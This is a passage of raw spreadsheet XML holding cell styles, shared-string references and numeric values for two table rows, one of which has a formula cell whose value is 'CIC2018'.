      </c>
      <c r="IH78" s="505">
        <v>0</v>
      </c>
      <c r="II78" s="252">
        <v>0</v>
      </c>
      <c r="IJ78" s="252">
        <v>0</v>
      </c>
      <c r="IK78" s="253">
        <v>0</v>
      </c>
      <c r="IL78" s="101">
        <v>0</v>
      </c>
      <c r="IM78" s="102">
        <v>0</v>
      </c>
      <c r="IN78" s="102">
        <v>0</v>
      </c>
      <c r="IO78" s="103">
        <v>0</v>
      </c>
      <c r="IP78" s="103">
        <v>0</v>
      </c>
      <c r="IQ78" s="104">
        <v>0</v>
      </c>
      <c r="IR78" s="105">
        <v>0</v>
      </c>
      <c r="IS78" s="106">
        <v>0</v>
      </c>
      <c r="IT78" s="497">
        <v>0</v>
      </c>
      <c r="IU78" s="107">
        <v>0</v>
      </c>
      <c r="IV78" s="107">
        <v>0</v>
      </c>
      <c r="IW78" s="108">
        <v>0</v>
      </c>
      <c r="IX78" s="109">
        <v>0</v>
      </c>
      <c r="IY78" s="110">
        <v>0</v>
      </c>
      <c r="IZ78" s="501">
        <v>0</v>
      </c>
      <c r="JA78" s="111">
        <v>0</v>
      </c>
      <c r="JB78" s="111">
        <v>0</v>
      </c>
      <c r="JC78" s="112">
        <v>0</v>
      </c>
      <c r="JD78" s="113">
        <v>0</v>
      </c>
      <c r="JE78" s="114">
        <v>0</v>
      </c>
      <c r="JF78" s="503">
        <v>0</v>
      </c>
      <c r="JG78" s="115">
        <v>0</v>
      </c>
      <c r="JH78" s="115">
        <v>0</v>
      </c>
      <c r="JI78" s="116">
        <v>0</v>
      </c>
      <c r="JJ78" s="101">
        <v>0</v>
      </c>
      <c r="JK78" s="102">
        <v>0</v>
      </c>
      <c r="JL78" s="102">
        <v>0</v>
      </c>
      <c r="JM78" s="103">
        <v>0</v>
      </c>
      <c r="JN78" s="103">
        <v>0</v>
      </c>
      <c r="JO78" s="104">
        <v>0</v>
      </c>
      <c r="JP78" s="105">
        <v>0</v>
      </c>
      <c r="JQ78" s="106">
        <v>0</v>
      </c>
      <c r="JR78" s="497">
        <v>0</v>
      </c>
      <c r="JS78" s="107">
        <v>0</v>
      </c>
      <c r="JT78" s="107">
        <v>0</v>
      </c>
      <c r="JU78" s="108">
        <v>0</v>
      </c>
      <c r="JV78" s="109">
        <v>0</v>
      </c>
      <c r="JW78" s="110">
        <v>0</v>
      </c>
      <c r="JX78" s="501">
        <v>0</v>
      </c>
      <c r="JY78" s="111">
        <v>0</v>
      </c>
      <c r="JZ78" s="111">
        <v>0</v>
      </c>
      <c r="KA78" s="112">
        <v>0</v>
      </c>
      <c r="KB78" s="113">
        <v>0</v>
      </c>
      <c r="KC78" s="114">
        <v>0</v>
      </c>
      <c r="KD78" s="503">
        <v>0</v>
      </c>
      <c r="KE78" s="115">
        <v>0</v>
      </c>
      <c r="KF78" s="115">
        <v>0</v>
      </c>
      <c r="KG78" s="116">
        <v>0</v>
      </c>
      <c r="KH78" s="250">
        <v>0</v>
      </c>
      <c r="KI78" s="251">
        <v>0</v>
      </c>
      <c r="KJ78" s="505">
        <v>0</v>
      </c>
      <c r="KK78" s="252">
        <v>0</v>
      </c>
      <c r="KL78" s="252">
        <v>0</v>
      </c>
      <c r="KM78" s="253">
        <v>0</v>
      </c>
      <c r="KN78" s="101">
        <v>0</v>
      </c>
      <c r="KO78" s="102">
        <v>0</v>
      </c>
      <c r="KP78" s="102">
        <v>0</v>
      </c>
      <c r="KQ78" s="103">
        <v>0</v>
      </c>
      <c r="KR78" s="103">
        <v>0</v>
      </c>
      <c r="KS78" s="104">
        <v>0</v>
      </c>
      <c r="KT78" s="105">
        <v>0</v>
      </c>
      <c r="KU78" s="106">
        <v>0</v>
      </c>
      <c r="KV78" s="497">
        <v>0</v>
      </c>
      <c r="KW78" s="107">
        <v>0</v>
      </c>
      <c r="KX78" s="107">
        <v>0</v>
      </c>
      <c r="KY78" s="108">
        <v>0</v>
      </c>
      <c r="KZ78" s="109">
        <v>0</v>
      </c>
      <c r="LA78" s="110">
        <v>0</v>
      </c>
      <c r="LB78" s="501">
        <v>0</v>
      </c>
      <c r="LC78" s="111">
        <v>0</v>
      </c>
      <c r="LD78" s="111">
        <v>0</v>
      </c>
      <c r="LE78" s="112">
        <v>0</v>
      </c>
      <c r="LF78" s="113">
        <v>0</v>
      </c>
      <c r="LG78" s="114">
        <v>0</v>
      </c>
      <c r="LH78" s="503">
        <v>0</v>
      </c>
      <c r="LI78" s="115">
        <v>0</v>
      </c>
      <c r="LJ78" s="115">
        <v>0</v>
      </c>
      <c r="LK78" s="116">
        <v>0</v>
      </c>
      <c r="LL78" s="117">
        <v>53713</v>
      </c>
      <c r="LM78" s="507">
        <v>53713</v>
      </c>
      <c r="LN78" s="119">
        <v>0</v>
      </c>
      <c r="LO78" s="119">
        <v>5</v>
      </c>
      <c r="LP78" s="119">
        <v>26831</v>
      </c>
      <c r="LQ78" s="119">
        <v>0</v>
      </c>
      <c r="LR78" s="119">
        <v>26831</v>
      </c>
      <c r="LS78" s="119">
        <v>26831</v>
      </c>
      <c r="LT78" s="382"/>
      <c r="LU78" s="117">
        <v>0</v>
      </c>
      <c r="LV78" s="118">
        <v>0</v>
      </c>
      <c r="LW78" s="507">
        <v>0</v>
      </c>
      <c r="LX78" s="119">
        <v>0</v>
      </c>
      <c r="LY78" s="119">
        <v>0</v>
      </c>
      <c r="LZ78" s="119">
        <v>0</v>
      </c>
      <c r="MA78" s="117">
        <v>0</v>
      </c>
      <c r="MB78" s="118">
        <v>0</v>
      </c>
      <c r="MC78" s="507">
        <v>0</v>
      </c>
      <c r="MD78" s="119">
        <v>0</v>
      </c>
      <c r="ME78" s="119">
        <v>0</v>
      </c>
      <c r="MF78" s="119">
        <v>0</v>
      </c>
      <c r="MG78" s="117">
        <v>0</v>
      </c>
      <c r="MH78" s="118">
        <v>0</v>
      </c>
      <c r="MI78" s="507">
        <v>0</v>
      </c>
      <c r="MJ78" s="119">
        <v>0</v>
      </c>
      <c r="MK78" s="119">
        <v>0</v>
      </c>
      <c r="ML78" s="119">
        <v>0</v>
      </c>
      <c r="MM78" s="117">
        <v>0</v>
      </c>
      <c r="MN78" s="118">
        <v>0</v>
      </c>
      <c r="MO78" s="507">
        <v>0</v>
      </c>
      <c r="MP78" s="119">
        <v>0</v>
      </c>
      <c r="MQ78" s="119">
        <v>0</v>
      </c>
      <c r="MR78" s="119">
        <v>0</v>
      </c>
      <c r="MS78" s="117">
        <v>0</v>
      </c>
      <c r="MT78" s="118">
        <v>0</v>
      </c>
      <c r="MU78" s="507">
        <v>0</v>
      </c>
      <c r="MV78" s="119">
        <v>0</v>
      </c>
      <c r="MW78" s="119">
        <v>0</v>
      </c>
      <c r="MX78" s="119">
        <v>0</v>
      </c>
      <c r="MY78" s="117">
        <v>0</v>
      </c>
      <c r="MZ78" s="118">
        <v>0</v>
      </c>
      <c r="NA78" s="507">
        <v>0</v>
      </c>
      <c r="NB78" s="119">
        <v>0</v>
      </c>
      <c r="NC78" s="119">
        <v>0</v>
      </c>
      <c r="ND78" s="119">
        <v>0</v>
      </c>
      <c r="NE78" s="117">
        <v>0</v>
      </c>
      <c r="NF78" s="118">
        <v>0</v>
      </c>
      <c r="NG78" s="507">
        <v>0</v>
      </c>
      <c r="NH78" s="119">
        <v>0</v>
      </c>
      <c r="NI78" s="119">
        <v>0</v>
      </c>
      <c r="NJ78" s="119">
        <v>0</v>
      </c>
      <c r="NK78" s="117">
        <v>35782</v>
      </c>
      <c r="NL78" s="118" t="s">
        <v>4395</v>
      </c>
      <c r="NM78" s="507">
        <v>35782</v>
      </c>
      <c r="NN78" s="119" t="s">
        <v>3470</v>
      </c>
      <c r="NO78" s="119">
        <v>2</v>
      </c>
      <c r="NP78" s="119">
        <v>26830</v>
      </c>
      <c r="NQ78" s="117">
        <v>0</v>
      </c>
      <c r="NR78" s="118">
        <v>0</v>
      </c>
      <c r="NS78" s="507">
        <v>0</v>
      </c>
      <c r="NT78" s="119">
        <v>0</v>
      </c>
      <c r="NU78" s="119">
        <v>0</v>
      </c>
      <c r="NV78" s="119">
        <v>0</v>
      </c>
      <c r="NW78" s="117">
        <v>17931</v>
      </c>
      <c r="NX78" s="118" t="s">
        <v>4396</v>
      </c>
      <c r="NY78" s="507">
        <v>17931</v>
      </c>
      <c r="NZ78" s="119" t="s">
        <v>4257</v>
      </c>
      <c r="OA78" s="119">
        <v>3</v>
      </c>
      <c r="OB78" s="119">
        <v>17828</v>
      </c>
      <c r="OC78" s="120">
        <v>27834</v>
      </c>
      <c r="OD78" s="120">
        <v>26922</v>
      </c>
      <c r="OE78" s="120">
        <v>2</v>
      </c>
      <c r="OF78" s="121">
        <v>1</v>
      </c>
      <c r="OG78" s="120">
        <v>26851</v>
      </c>
      <c r="OH78" s="120">
        <v>26851</v>
      </c>
      <c r="OI78" s="120">
        <v>26851</v>
      </c>
      <c r="OJ78" s="120">
        <v>26851</v>
      </c>
      <c r="OK78" s="383"/>
      <c r="OL78" s="120">
        <v>27834</v>
      </c>
      <c r="OM78" s="120">
        <v>27834</v>
      </c>
      <c r="ON78" s="120">
        <v>26922</v>
      </c>
      <c r="OO78" s="120" t="s">
        <v>3120</v>
      </c>
      <c r="OP78" s="120">
        <v>2</v>
      </c>
      <c r="OQ78" s="464">
        <v>26851</v>
      </c>
      <c r="OR78" s="120">
        <v>0</v>
      </c>
      <c r="OS78" s="120">
        <v>0</v>
      </c>
      <c r="OT78" s="120">
        <v>0</v>
      </c>
      <c r="OU78" s="120"/>
      <c r="OV78" s="120">
        <v>0</v>
      </c>
      <c r="OW78" s="464">
        <v>0</v>
      </c>
      <c r="OX78" s="120">
        <v>0</v>
      </c>
      <c r="OY78" s="120">
        <v>0</v>
      </c>
      <c r="OZ78" s="120">
        <v>0</v>
      </c>
      <c r="PA78" s="120"/>
      <c r="PB78" s="120">
        <v>0</v>
      </c>
      <c r="PC78" s="464">
        <v>0</v>
      </c>
      <c r="PD78" s="120">
        <v>0</v>
      </c>
      <c r="PE78" s="120">
        <v>0</v>
      </c>
      <c r="PF78" s="120">
        <v>0</v>
      </c>
      <c r="PG78" s="120"/>
      <c r="PH78" s="120">
        <v>0</v>
      </c>
      <c r="PI78" s="464">
        <v>0</v>
      </c>
      <c r="PJ78" s="120">
        <v>0</v>
      </c>
      <c r="PK78" s="120">
        <v>0</v>
      </c>
      <c r="PL78" s="120">
        <v>0</v>
      </c>
      <c r="PM78" s="120"/>
      <c r="PN78" s="120">
        <v>0</v>
      </c>
      <c r="PO78" s="464">
        <v>0</v>
      </c>
      <c r="PP78" s="120">
        <v>0</v>
      </c>
      <c r="PQ78" s="120">
        <v>0</v>
      </c>
      <c r="PR78" s="120">
        <v>0</v>
      </c>
      <c r="PS78" s="120"/>
      <c r="PT78" s="120">
        <v>0</v>
      </c>
      <c r="PU78" s="464">
        <v>0</v>
      </c>
      <c r="PV78" s="120">
        <v>0</v>
      </c>
      <c r="PW78" s="120">
        <v>0</v>
      </c>
      <c r="PX78" s="120">
        <v>0</v>
      </c>
      <c r="PY78" s="120"/>
      <c r="PZ78" s="120">
        <v>0</v>
      </c>
      <c r="QA78" s="464">
        <v>0</v>
      </c>
      <c r="QB78" s="120">
        <v>0</v>
      </c>
      <c r="QC78" s="120">
        <v>0</v>
      </c>
      <c r="QD78" s="120">
        <v>0</v>
      </c>
      <c r="QE78" s="120"/>
      <c r="QF78" s="120">
        <v>0</v>
      </c>
      <c r="QG78" s="464">
        <v>0</v>
      </c>
      <c r="QH78" s="120">
        <v>27834</v>
      </c>
      <c r="QI78" s="120">
        <v>27834</v>
      </c>
      <c r="QJ78" s="120">
        <v>26851</v>
      </c>
      <c r="QK78" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL78" s="120">
        <v>1</v>
      </c>
      <c r="QM78" s="464">
        <v>26851</v>
      </c>
      <c r="QN78" s="120">
        <v>0</v>
      </c>
      <c r="QO78" s="120">
        <v>0</v>
      </c>
      <c r="QP78" s="120">
        <v>0</v>
      </c>
      <c r="QQ78" s="120"/>
      <c r="QR78" s="120">
        <v>0</v>
      </c>
      <c r="QS78" s="464">
        <v>0</v>
      </c>
      <c r="QT78" s="184"/>
      <c r="QU78" s="184"/>
      <c r="QV78" s="184"/>
      <c r="QW78" s="184"/>
      <c r="QX78" s="184"/>
      <c r="QY78" s="184"/>
      <c r="QZ78" s="184"/>
      <c r="RA78" s="184"/>
      <c r="RB78" s="184"/>
      <c r="RC78" s="184"/>
      <c r="RD78" s="184"/>
      <c r="RE78" s="184"/>
      <c r="RF78" s="184"/>
      <c r="RG78" s="184"/>
      <c r="RH78" s="184"/>
      <c r="RI78" s="184"/>
      <c r="RJ78" s="184"/>
      <c r="RK78" s="184"/>
      <c r="RL78" s="184"/>
      <c r="RM78" s="184"/>
      <c r="RN78" s="184"/>
      <c r="RO78" s="184"/>
      <c r="RP78" s="184"/>
      <c r="RQ78" s="184"/>
      <c r="RR78" s="184"/>
      <c r="RS78" s="184"/>
      <c r="RT78" s="184"/>
      <c r="RU78" s="184"/>
      <c r="RV78" s="184"/>
      <c r="RW78" s="184"/>
      <c r="RX78" s="184"/>
      <c r="RY78" s="184"/>
      <c r="RZ78" s="184"/>
      <c r="SA78" s="184"/>
      <c r="SB78" s="184"/>
      <c r="SC78" s="184"/>
      <c r="SD78" s="184"/>
      <c r="SE78" s="184"/>
      <c r="SF78" s="184"/>
      <c r="SG78" s="184"/>
      <c r="SH78" s="184"/>
      <c r="SI78" s="184"/>
      <c r="SJ78" s="184"/>
      <c r="SK78" s="184"/>
      <c r="SL78" s="184"/>
      <c r="SM78" s="184"/>
      <c r="SN78" s="184"/>
      <c r="SO78" s="184"/>
      <c r="SP78" s="184"/>
      <c r="SQ78" s="184"/>
      <c r="SR78" s="184"/>
      <c r="SS78" s="184"/>
      <c r="ST78" s="184"/>
      <c r="SU78" s="184"/>
      <c r="SV78" s="184"/>
      <c r="SW78" s="184"/>
      <c r="SX78" s="184"/>
      <c r="SY78" s="184"/>
      <c r="SZ78" s="184"/>
      <c r="TA78" s="184"/>
      <c r="TB78" s="184"/>
      <c r="TC78" s="184"/>
      <c r="TD78" s="184"/>
      <c r="TE78" s="184"/>
      <c r="TF78" s="184"/>
      <c r="TG78" s="184"/>
      <c r="TH78" s="184"/>
      <c r="TI78" s="184"/>
      <c r="TJ78" s="184"/>
      <c r="TK78" s="184"/>
      <c r="TL78" s="184"/>
      <c r="TM78" s="184"/>
      <c r="TN78" s="184"/>
      <c r="TO78" s="184"/>
      <c r="TP78" s="184"/>
      <c r="TQ78" s="184"/>
      <c r="TR78" s="184"/>
      <c r="TS78" s="184"/>
      <c r="TT78" s="184"/>
      <c r="TU78" s="184"/>
      <c r="TV78" s="184"/>
      <c r="TW78" s="184"/>
      <c r="TX78" s="184"/>
      <c r="TY78" s="184"/>
      <c r="TZ78" s="184"/>
      <c r="UA78" s="184"/>
      <c r="UB78" s="184"/>
      <c r="UC78" s="184"/>
      <c r="UD78" s="184"/>
      <c r="UE78" s="184"/>
      <c r="UF78" s="184"/>
      <c r="UG78" s="184"/>
      <c r="UH78" s="184"/>
      <c r="UI78" s="184"/>
      <c r="UJ78" s="184"/>
      <c r="UK78" s="184"/>
      <c r="UL78" s="184"/>
      <c r="UM78" s="184"/>
      <c r="UN78" s="184"/>
      <c r="UO78" s="184"/>
      <c r="UP78" s="184"/>
      <c r="UQ78" s="184"/>
      <c r="UR78" s="184"/>
      <c r="US78" s="184"/>
      <c r="UT78" s="184"/>
      <c r="UU78" s="184"/>
      <c r="UV78" s="184"/>
      <c r="UW78" s="184"/>
      <c r="UX78" s="184"/>
      <c r="UY78" s="184"/>
      <c r="UZ78" s="184"/>
      <c r="VA78" s="184"/>
      <c r="VB78" s="184"/>
      <c r="VC78" s="184"/>
      <c r="VD78" s="184"/>
      <c r="VE78" s="184"/>
      <c r="VF78" s="184"/>
      <c r="VG78" s="184"/>
      <c r="VH78" s="184"/>
      <c r="VI78" s="184"/>
      <c r="VJ78" s="184"/>
      <c r="VK78" s="184"/>
      <c r="VL78" s="184"/>
      <c r="VM78" s="184"/>
      <c r="VN78" s="184"/>
      <c r="VO78" s="184"/>
      <c r="VP78" s="184"/>
      <c r="VQ78" s="184"/>
      <c r="VR78" s="184"/>
      <c r="VS78" s="184"/>
      <c r="VT78" s="184"/>
      <c r="VU78" s="184"/>
      <c r="VV78" s="184"/>
      <c r="VW78" s="184"/>
      <c r="VX78" s="184"/>
      <c r="VY78" s="184"/>
    </row>
    <row r="79" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A79" s="82" t="s">
        <v>107</v>
      </c>
      <c r="B79" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C79" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D79" s="83" t="s">
        <v>114</v>
      </c>
      <c r="E79" s="83">
        <f t="shared" si="5"/>
        <v>48</v>
      </c>
      <c r="F79" s="83" t="s">
        <v>115</v>
      </c>
      <c r="G79" s="94" t="s">
        <v>1415</v>
      </c>
      <c r="H79" s="83" t="s">
        <v>1416</v>
      </c>
      <c r="I79" s="81" t="s">
        <v>1394</v>
      </c>
      <c r="J79" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K79" s="81" t="s">
        <v>1422</v>
      </c>
      <c r="L79" s="81" t="s">
        <v>1423</v>
      </c>
      <c r="M79" s="378" t="s">
        <v>279</v>
      </c>
      <c r="N79" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O79" s="485" t="str">
        <f t="shared" si="4"/>
        <v>CIC2018</v>
      </c>
      <c r="P79" s="91"/>
      <c r="Q79" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R79" s="92" t="s">
        <v>1419</v>
      </c>
      <c r="S79" s="93" t="s">
        <v>843</v>
      </c>
      <c r="T79" s="92" t="s">
        <v>1420</v>
      </c>
      <c r="U79" s="94" t="s">
        <v>1424</v>
      </c>
      <c r="V79" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W79" s="96" t="s">
        <v>1320</v>
      </c>
      <c r="X79" s="97" t="s">
        <v>886</v>
      </c>
      <c r="Y79" s="83" t="s">
        <v>886</v>
      </c>
      <c r="Z79" s="98" t="s">
        <v>1374</v>
      </c>
      <c r="AA79" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB79" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC79" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD79" s="83"/>
      <c r="AE79" s="83"/>
      <c r="AF79" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG79" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH79" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI79" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ79" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK79" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL79" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM79" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN79" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO79" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP79" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ79" s="648">
        <v>1802279</v>
      </c>
      <c r="AR79" s="647"/>
      <c r="AS79" s="647">
        <v>68350</v>
      </c>
      <c r="AT79" s="647">
        <v>0</v>
      </c>
      <c r="AU79" s="647">
        <v>68350</v>
      </c>
      <c r="AV79" s="650" t="s">
        <v>4</v>
      </c>
      <c r="AW79" s="647">
        <v>68350</v>
      </c>
      <c r="AX79" s="647">
        <v>68350</v>
      </c>
      <c r="AY79" s="647">
        <v>0</v>
      </c>
      <c r="AZ79" s="647">
        <v>68350</v>
      </c>
      <c r="BA79" s="381" t="s">
        <v>4899</v>
      </c>
      <c r="BB79" s="101">
        <v>8140</v>
      </c>
      <c r="BC79" s="102" t="s">
        <v>1822</v>
      </c>
      <c r="BD79" s="102">
        <v>4246</v>
      </c>
      <c r="BE79" s="103" t="s">
        <v>1819</v>
      </c>
      <c r="BF79" s="103">
        <v>1</v>
      </c>
      <c r="BG79" s="104">
        <v>4246</v>
      </c>
      <c r="BH79" s="105">
        <v>0</v>
      </c>
      <c r="BI79" s="106">
        <v>0</v>
      </c>
      <c r="BJ79" s="497">
        <v>0</v>
      </c>
      <c r="BK79" s="107">
        <v>0</v>
      </c>
      <c r="BL79" s="107">
        <v>0</v>
      </c>
      <c r="BM79" s="108">
        <v>0</v>
      </c>
      <c r="BN79" s="109">
        <v>8140</v>
      </c>
      <c r="BO79" s="110" t="s">
        <v>1822</v>
      </c>
      <c r="BP79" s="501">
        <v>4246</v>
      </c>
      <c r="BQ79" s="111" t="s">
        <v>1819</v>
      </c>
      <c r="BR79" s="111">
        <v>1</v>
      </c>
      <c r="BS79" s="112">
        <v>4246</v>
      </c>
      <c r="BT79" s="113">
        <v>652208</v>
      </c>
      <c r="BU79" s="114" t="s">
        <v>3540</v>
      </c>
      <c r="BV79" s="503">
        <v>29230</v>
      </c>
      <c r="BW79" s="115" t="s">
        <v>3541</v>
      </c>
      <c r="BX79" s="115">
        <v>3</v>
      </c>
      <c r="BY79" s="116">
        <v>14116</v>
      </c>
      <c r="BZ79" s="250">
        <v>23</v>
      </c>
      <c r="CA79" s="251" t="s">
        <v>3542</v>
      </c>
      <c r="CB79" s="505">
        <v>23</v>
      </c>
      <c r="CC79" s="252" t="s">
        <v>3543</v>
      </c>
      <c r="CD79" s="252">
        <v>2</v>
      </c>
      <c r="CE79" s="253">
        <v>23</v>
      </c>
      <c r="CF79" s="101">
        <v>652231</v>
      </c>
      <c r="CG79" s="102" t="s">
        <v>3544</v>
      </c>
      <c r="CH79" s="102">
        <v>29253</v>
      </c>
      <c r="CI79" s="103" t="s">
        <v>3545</v>
      </c>
      <c r="CJ79" s="103">
        <v>5</v>
      </c>
      <c r="CK79" s="104">
        <v>14116</v>
      </c>
      <c r="CL79" s="105">
        <v>0</v>
      </c>
      <c r="CM79" s="106">
        <v>0</v>
      </c>
      <c r="CN79" s="497">
        <v>0</v>
      </c>
      <c r="CO79" s="107">
        <v>0</v>
      </c>
      <c r="CP79" s="107">
        <v>0</v>
      </c>
      <c r="CQ79" s="108">
        <v>0</v>
      </c>
      <c r="CR79" s="109">
        <v>0</v>
      </c>
      <c r="CS79" s="110">
        <v>0</v>
      </c>
      <c r="CT79" s="501">
        <v>0</v>
      </c>
      <c r="CU79" s="111">
        <v>0</v>
      </c>
      <c r="CV79" s="111">
        <v>0</v>
      </c>
      <c r="CW79" s="112">
        <v>0</v>
      </c>
      <c r="CX79" s="113">
        <v>8140</v>
      </c>
      <c r="CY79" s="114" t="s">
        <v>1822</v>
      </c>
      <c r="CZ79" s="503">
        <v>4246</v>
      </c>
      <c r="DA79" s="115" t="s">
        <v>1819</v>
      </c>
      <c r="DB79" s="115">
        <v>1</v>
      </c>
      <c r="DC79" s="116">
        <v>4246</v>
      </c>
      <c r="DD79" s="101">
        <v>0</v>
      </c>
      <c r="DE79" s="102">
        <v>0</v>
      </c>
      <c r="DF79" s="102">
        <v>0</v>
      </c>
      <c r="DG79" s="103">
        <v>0</v>
      </c>
      <c r="DH79" s="103">
        <v>0</v>
      </c>
      <c r="DI79" s="104">
        <v>0</v>
      </c>
      <c r="DJ79" s="105">
        <v>0</v>
      </c>
      <c r="DK79" s="106">
        <v>0</v>
      </c>
      <c r="DL79" s="497">
        <v>0</v>
      </c>
      <c r="DM79" s="107">
        <v>0</v>
      </c>
      <c r="DN79" s="107">
        <v>0</v>
      </c>
      <c r="DO79" s="108">
        <v>0</v>
      </c>
      <c r="DP79" s="109">
        <v>0</v>
      </c>
      <c r="DQ79" s="110">
        <v>0</v>
      </c>
      <c r="DR79" s="501">
        <v>0</v>
      </c>
      <c r="DS79" s="111">
        <v>0</v>
      </c>
      <c r="DT79" s="111">
        <v>0</v>
      </c>
      <c r="DU79" s="112">
        <v>0</v>
      </c>
      <c r="DV79" s="113">
        <v>340240</v>
      </c>
      <c r="DW79" s="114" t="s">
        <v>3546</v>
      </c>
      <c r="DX79" s="503">
        <v>14116</v>
      </c>
      <c r="DY79" s="115" t="s">
        <v>1894</v>
      </c>
      <c r="DZ79" s="115">
        <v>1</v>
      </c>
      <c r="EA79" s="116">
        <v>14116</v>
      </c>
      <c r="EB79" s="250">
        <v>0</v>
      </c>
      <c r="EC79" s="251">
        <v>0</v>
      </c>
      <c r="ED79" s="505">
        <v>0</v>
      </c>
      <c r="EE79" s="252">
        <v>0</v>
      </c>
      <c r="EF79" s="252">
        <v>0</v>
      </c>
      <c r="EG79" s="253">
        <v>0</v>
      </c>
      <c r="EH79" s="101">
        <v>340240</v>
      </c>
      <c r="EI79" s="102" t="s">
        <v>3546</v>
      </c>
      <c r="EJ79" s="102">
        <v>14116</v>
      </c>
      <c r="EK79" s="103" t="s">
        <v>1894</v>
      </c>
      <c r="EL79" s="103">
        <v>1</v>
      </c>
      <c r="EM79" s="104">
        <v>14116</v>
      </c>
      <c r="EN79" s="105">
        <v>0</v>
      </c>
      <c r="EO79" s="106">
        <v>0</v>
      </c>
      <c r="EP79" s="497">
        <v>0</v>
      </c>
      <c r="EQ79" s="107">
        <v>0</v>
      </c>
      <c r="ER79" s="107">
        <v>0</v>
      </c>
      <c r="ES79" s="108">
        <v>0</v>
      </c>
      <c r="ET79" s="109">
        <v>0</v>
      </c>
      <c r="EU79" s="110">
        <v>0</v>
      </c>
      <c r="EV79" s="501">
        <v>0</v>
      </c>
      <c r="EW79" s="111">
        <v>0</v>
      </c>
      <c r="EX79" s="111">
        <v>0</v>
      </c>
      <c r="EY79" s="112">
        <v>0</v>
      </c>
      <c r="EZ79" s="113">
        <v>0</v>
      </c>
      <c r="FA79" s="114">
        <v>0</v>
      </c>
      <c r="FB79" s="503">
        <v>0</v>
      </c>
      <c r="FC79" s="115">
        <v>0</v>
      </c>
      <c r="FD79" s="115">
        <v>0</v>
      </c>
      <c r="FE79" s="116">
        <v>0</v>
      </c>
      <c r="FF79" s="101">
        <v>8140</v>
      </c>
      <c r="FG79" s="102" t="s">
        <v>1822</v>
      </c>
      <c r="FH79" s="102">
        <v>4246</v>
      </c>
      <c r="FI79" s="103" t="s">
        <v>1819</v>
      </c>
      <c r="FJ79" s="103">
        <v>1</v>
      </c>
      <c r="FK79" s="104">
        <v>4246</v>
      </c>
      <c r="FL79" s="105">
        <v>0</v>
      </c>
      <c r="FM79" s="106">
        <v>0</v>
      </c>
      <c r="FN79" s="497">
        <v>0</v>
      </c>
      <c r="FO79" s="107">
        <v>0</v>
      </c>
      <c r="FP79" s="107">
        <v>0</v>
      </c>
      <c r="FQ79" s="108">
        <v>0</v>
      </c>
      <c r="FR79" s="109">
        <v>8140</v>
      </c>
      <c r="FS79" s="110" t="s">
        <v>1822</v>
      </c>
      <c r="FT79" s="501">
        <v>4246</v>
      </c>
      <c r="FU79" s="111" t="s">
        <v>1819</v>
      </c>
      <c r="FV79" s="111">
        <v>1</v>
      </c>
      <c r="FW79" s="112">
        <v>4246</v>
      </c>
      <c r="FX79" s="113">
        <v>311968</v>
      </c>
      <c r="FY79" s="114" t="s">
        <v>3547</v>
      </c>
      <c r="FZ79" s="503">
        <v>15114</v>
      </c>
      <c r="GA79" s="115" t="s">
        <v>3548</v>
      </c>
      <c r="GB79" s="115">
        <v>2</v>
      </c>
      <c r="GC79" s="116">
        <v>14116</v>
      </c>
      <c r="GD79" s="250">
        <v>23</v>
      </c>
      <c r="GE79" s="251" t="s">
        <v>3542</v>
      </c>
      <c r="GF79" s="505">
        <v>23</v>
      </c>
      <c r="GG79" s="252" t="s">
        <v>3543</v>
      </c>
      <c r="GH79" s="252">
        <v>2</v>
      </c>
      <c r="GI79" s="253">
        <v>23</v>
      </c>
      <c r="GJ79" s="101">
        <v>311991</v>
      </c>
      <c r="GK79" s="102" t="s">
        <v>3549</v>
      </c>
      <c r="GL79" s="102">
        <v>15137</v>
      </c>
      <c r="GM79" s="103" t="s">
        <v>3550</v>
      </c>
      <c r="GN79" s="103">
        <v>4</v>
      </c>
      <c r="GO79" s="104">
        <v>14116</v>
      </c>
      <c r="GP79" s="105">
        <v>0</v>
      </c>
      <c r="GQ79" s="106">
        <v>0</v>
      </c>
      <c r="GR79" s="497">
        <v>0</v>
      </c>
      <c r="GS79" s="107">
        <v>0</v>
      </c>
      <c r="GT79" s="107">
        <v>0</v>
      </c>
      <c r="GU79" s="108">
        <v>0</v>
      </c>
      <c r="GV79" s="109">
        <v>0</v>
      </c>
      <c r="GW79" s="110">
        <v>0</v>
      </c>
      <c r="GX79" s="501">
        <v>0</v>
      </c>
      <c r="GY79" s="111">
        <v>0</v>
      </c>
      <c r="GZ79" s="111">
        <v>0</v>
      </c>
      <c r="HA79" s="112">
        <v>0</v>
      </c>
      <c r="HB79" s="113">
        <v>8140</v>
      </c>
      <c r="HC79" s="114" t="s">
        <v>1822</v>
      </c>
      <c r="HD79" s="503">
        <v>4246</v>
      </c>
      <c r="HE79" s="115" t="s">
        <v>1819</v>
      </c>
      <c r="HF79" s="115">
        <v>1</v>
      </c>
      <c r="HG79" s="116">
        <v>4246</v>
      </c>
      <c r="HH79" s="101">
        <v>0</v>
      </c>
      <c r="HI79" s="102">
        <v>0</v>
      </c>
      <c r="HJ79" s="102">
        <v>0</v>
      </c>
      <c r="HK79" s="103">
        <v>0</v>
      </c>
      <c r="HL79" s="103">
        <v>0</v>
      </c>
      <c r="HM79" s="104">
        <v>0</v>
      </c>
      <c r="HN79" s="105">
        <v>0</v>
      </c>
      <c r="HO79" s="106">
        <v>0</v>
      </c>
      <c r="HP79" s="497">
        <v>0</v>
      </c>
      <c r="HQ79" s="107">
